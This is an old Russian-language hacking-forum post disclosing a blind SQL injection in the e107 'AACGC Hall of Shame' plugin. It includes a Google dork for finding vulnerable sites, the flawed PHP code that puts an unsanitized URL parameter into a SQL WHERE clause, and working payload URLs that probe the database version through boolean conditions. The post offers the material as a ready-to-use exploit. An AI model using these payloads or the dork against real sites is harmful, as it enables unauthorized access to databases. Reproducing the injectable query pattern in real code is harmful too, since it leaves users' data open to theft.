02.05.2010, 18:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
AACGC Hall of Shame v1.6 by ~M@CH!N3~
07:27 02-Apr-10
скачать Blind SQL inj
гугл- inurl:e107_plugins/aacgc_hos
[path]/e107_plugins/aacgc_hos/HOS_Details.php
PHP код:
...require_once("../../class2.php");
require_once(HEADERF);
if (e_QUERY) {
$tmp = explode('.', e_QUERY);
$action = $tmp[0];
$sub_action = $tmp[1];
$id = $tmp[2];
unset($tmp);
}
//------------------------------------------------------------------------------------------------------------
$text .= "<center><table style='width:90%' class='indent' cellspacing='' cellpadding=''>";
$sql->db_Select("aacgc_hos", "*", "WHERE hos_id = $sub_action","");
$row = $sql->db_Fetch();...
плюс - никаких условий.
минус - надо знать hos_id.
Результат:
Пусть hos_id=1 и 5 ветка
http://[host]/[path]/e107_plugins/aacgc_hos/HOS_details.php?.1 and substring(version(),1,1)=5 - есть контент!
http://[host]/[path]/e107_plugins/aacgc_hos/HOS_details.php?.1 and substring(version(),1,1)=4 - нет контента!
ps с "+" контент не выводился (если в гет пихать)
Последний раз редактировалось Strilo4ka; 02.05.2010 в 18:37..
|
|
|